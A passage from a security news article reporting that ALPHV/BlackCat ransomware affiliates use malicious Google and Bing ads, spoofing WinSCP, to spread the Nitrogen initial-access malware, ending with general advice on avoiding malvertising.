They can also use the name of a fictional company to lure their targets into clicking on the ads. These cyberattacks seem to be part of a larger campaign involving malicious ads for WinSCP placed on both Google and Bing search results by ALPHV/BlackCat affiliates.

“The malvertising attacks they shut down in the past three weeks on behalf of the law firm and manufacturer are a continuation of a June 2023 campaign, where an affiliate of the ALPHV/BlackCat Ransomware gang was observed using malicious ads to distribute the Nitrogen malware, which led to the ALPHV/BlackCat ransomware” eSentire’s **blog post** revealed. 

Nitrogen is an initial-access malware **discovered** in June 2023. It uses obfuscated Python libraries and DLL sideloading to evade detection and hide its attack path after infection.

After getting installed, it lets attackers gain a foothold in the targeted entity’s IT environment. Attackers can then infiltrate deeper and launch malware of their choice. In the ongoing campaign, victims are typically infected with ALPHV/BlackCat ransomware, eSentire TRU’s senior threat intelligence researcher Keegan Keplinger noted.

For your information, the ALPHV/BlackCat ransomware gang is known for its $100 million **MGM Resorts breach**. Its attack tactics have evolved from experienced ransomware operators such as the Colonial Pipeline attack fame **DarkSide**, REvil, and BlackMatter. Some of its prominent affiliates include Scatted Spider, FIN7, and UNC2565. 

The BlackCat/ALPHV ransomware presents a significant threat to businesses and unsuspecting users. The severity is underscored by the FBI’s release of Indicators of Compromise (IoC) **last year** (PDF).

Considering that ransomware operators are now exploiting **social media and Google Ads** to reach a wider audience, business owners should remain cautious of unexpected ads or too-good-to-be-true offers.

Always verify the legitimacy of the company offering the ad before clicking on it. Never download software from unknown/unverified sources, and use a reputable anti-malware program.

****_RELATED ARTICLES_****

1.  **Hackers use Google Ads to steal $50 million of Bitcoin**
2.  **Google Ads Malware Wipes NFT Influencer’s Crypto Wallet**
3.  **Malicious Ads Infiltrate Bing AI Chatbot in Malvertising Attack**
4.  **Fake Brave browser website dropped malware, thanks to Google Ads**
5.  **Ad-blocker Chrome extension AllBlock injected ads in Google searches**

ALPHV (BlackCat) Ransomware Gang Uses Google Ads for Targeted Victims

Microsoft Edge (Chromium-based) Spoofing Vulnerability

CVE-2023-36026

Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability

Tag

#chrome